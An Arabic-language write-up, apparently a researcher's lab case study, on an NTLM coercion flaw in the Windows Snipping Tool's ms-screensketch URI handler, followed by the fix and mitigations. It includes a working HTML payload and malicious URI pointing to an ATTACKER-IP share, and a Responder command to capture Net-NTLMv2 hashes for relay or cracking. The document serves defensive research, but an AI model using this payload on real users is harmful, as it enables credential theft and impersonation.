
دراسة حالة ثغرة أمنية: CVE-2026-33829 (إكراه NTLM عبر أداة القصاصات في Windows)
دراسة حالة ثغرة: CVE-2026-33829 (إجبار NTLM عبر أداة القص في ويندوز)
يشرح هذا التقرير إعادة الإنتاج التقني لثغرة CVE-2026-33829، وهي ثغرة كشف معلومات داخل إطار عمل تطبيق أداة القص الحديث في ويندوز. من خلال استغلال معامل إدخال غير مُتحقق منه داخل معالج بروتوكول URI مخصص، يمكن لمضيف بعيد إجبار جهاز ويندوز غير مُحدَّث على بدء اتصال SMB صادر، مما ينتج عنه تسريب تجزئات مصادقة Net-NTLMv2 عبر الشبكة.
مخطط URI - (يستخدم ويندوز بروتوكولات مخصصة (مثل ms-screensketch:, ms-settings: , file:) للسماح لمتصفحات الويب بالتواصل مع تطبيقات سطح المكتب.
يكمن السبب الجذري لهذه الثغرة في مخطط URI (ms-screensketch:edit). عندما ينقر الضحية على رابط خبيث يحتوي على (ms-screensketch:edit?&filePath=\\ATTACKER_IP\\share\evil.png) ويوافق على "فتح أداة القص"، يستدعي نظام التشغيل الملف التنفيذي SnippingTool.exe ويمرر معامل filePath الخبيث، مثل (ms-screensketch:edit?filePath=\\ATTACKER-IP\\share\evil.png)، دون تحقق سليم.
ونظرًا لوجود معامل :edit?، تحاول أداة القص تحرير الملف من مسار الملف المقدم (filePath=\\ATTACKER-IP\\share\evil.png)، مما يؤدي إلى بدء اتصال عبر الشبكة باستخدام بروتوكول Server Message Block (SMB). ولأن SMB مصمم للتحقق من هوية طالب الملف، تحاول ويندوز تلقائيًا مصادقة المستخدم، وترسل تجزئة تحدّي-استجابة Net-NTLMv2 الخاصة بالمستخدم المسجل حاليًا إلى خادم المهاجم. تتم العملية برمتها بصمت في الخلفية دون أي تحذير أو مطالبة مرئية للمستخدم.
يلتقط المهاجم بيانات مصادقة تحدّي-استجابة Net-NTLMv2 الخاصة بالضحية. وبمجرد حصول المهاجم على تجزئة Net-NTLM الخاصة بالضحية، يمكنه تنفيذ هجوم إعادة توجيه NTLM (NTLM relay) لانتحال شخصية الضحية والوصول إلى موارد الشبكة الداخلية أو المصادقة على خدمات أخرى داخل المؤسسة، أو أخذ التجزئة الملتقطة واستخدام هجمات القوة الغاشمة أو هجمات القواميس لاكتشاف كلمة مرور ويندوز الفعلية للمستخدم.
لتشغيل المعالج، تم نشر حمولة HTML بسيطة لمحاكاة ناقل تصيد أو اختراق شبكة داخلية
<!DOCTYPE html>
<html>
<body>
<button onclick="window.location.href='ms-screensketch:edit?&filePath=\\ATTACKER-IP\share\test.png&isTemporary=false&saved=true&source=Toast'">Launch Verification</button>
</body>
</html>
لالتقاط التجزئة، تم نشر نسخة معزولة من Kali Linux تعمل عليها أداة Responder
sudo responder -I eth0 -v
عند النقر على الزر داخل بيئة ويندوز المستهدفة، فتح التطبيق سياق التحرير (Edit) وجرى توجيه طلب SMB فورًا إلى المضيف المستمع. اكتمل تسلسل تحدّي-استجابة المصادقة بسلاسة، مما أدى إلى التقاط بنية تجزئة Net-NTLMv2 لسياق المستخدم المستهدف.
تُظهر حزمة NTLMSSP_NEGOTIATE قيام النظام الضحية ببدء مصادقة NTLM أثناء إعداد جلسة SMB بعد حل مسار UNC الذي يتحكم فيه المهاجم
تحتوي حزمة NTLMSSP_AUTH على بيانات مصادقة تحدّي-استجابة Net-NTLMv2 التي أرسلها النظام الضحية بعد اكتمال مرحلة التحدي.
من ذلك، يلتقط المهاجم تجزئة NTLMv2 الممرَّرة
يمكن استغلال بيانات تحدّي-استجابة Net-NTLMv2 الملتقطة في هجمات إعادة توجيه NTLM (NTLM relay) أو إخضاعها لمحاولات كسر كلمات المرور دون اتصال، حسب البيئة المستهدفة
كيف قامت ويندوز بإصلاح هذا الأمر؟
قبل التحديث، كانت وظيفة التحرير في أداة القص تأخذ السلسلة داخل filePath وتمررها مباشرة إلى واجهات برمجة التطبيقات لفتح الملفات.
يشير السلوك الملاحَظ بعد التحديث إلى أن مايكروسوفت أدخلت منطق تحقق يمنع قيم filePath المستندة إلى UNC/الشبكة من الوصول إلى واجهات برمجة التطبيقات الأساسية لمعالجة الملفات. الآن، عند تمرير سلسلة إلى filePath، يجري التطبيق فحص سلامة قبل تسليمها إلى نظام التشغيل:
يتحقق مما إذا كانت السلسلة تبدأ بمحددات محركات أقراص محلية (مثل C:\ أو D:) أو متغيرات نظام محلية آمنة قياسية.
إذا اكتشف التطبيق بادئة اصطلاح التسمية العالمي (UNC) (مثل \ أو \\)، أو نمط عنوان IP خارجي على الشبكة، تضعها حلقة التحقق كوسيط غير قانوني، وترمي خطأ استثناء، وتنهي عملية تحميل الملف فورًا.
نظرًا لأن الكود يتوقف قبل تنفيذ تعليمات فتح الملفات الخاصة بـ Win32، فإن نواة ويندوز لا تتلقى الطلب أبدًا، ولا يتم إرسال أي حزمة SMB.
عند المحاولة مرة أخرى بعد تطبيق التحديث الأمني، استمر التطبيق في استدعاء معالج ms-screensketch:، لكن قيم filePath البعيدة لم تعد تُعالج عبر سير عمل التحرير (Edit)
تأكد من تحديث جميع نقاط نهاية ويندوز بما يتجاوز خط الأساس للتحديثات الأمنية الصادر في 14 أبريل 2026، والذي يقدم حدود تحقق صارمة من المدخلات لمعالج التطبيق.
فرض قواعد جدار حماية صارمة للاتصالات الصادرة تمنع حركة مرور منفذ TCP 445 إلى الشبكات الخارجية غير المصرح بها، للتخفيف من خطر تسريب بيانات الاعتماد.
تكوين كائنات نهج المجموعة (GPOs) لتقييد حركة مرور NTLM الصادرة إلى الخوادم البعيدة، وفرض بروتوكولات بديلة آمنة مثل Kerberos حيثما أمكن.
إخلاء مسؤولية: أُعدّ هذا التقرير لأغراض تعليمية وبحث دفاعي واختبار معملي فقط. تم تنفيذ جميع الاختبارات داخل بيئة معزولة تمامًا (sandbox).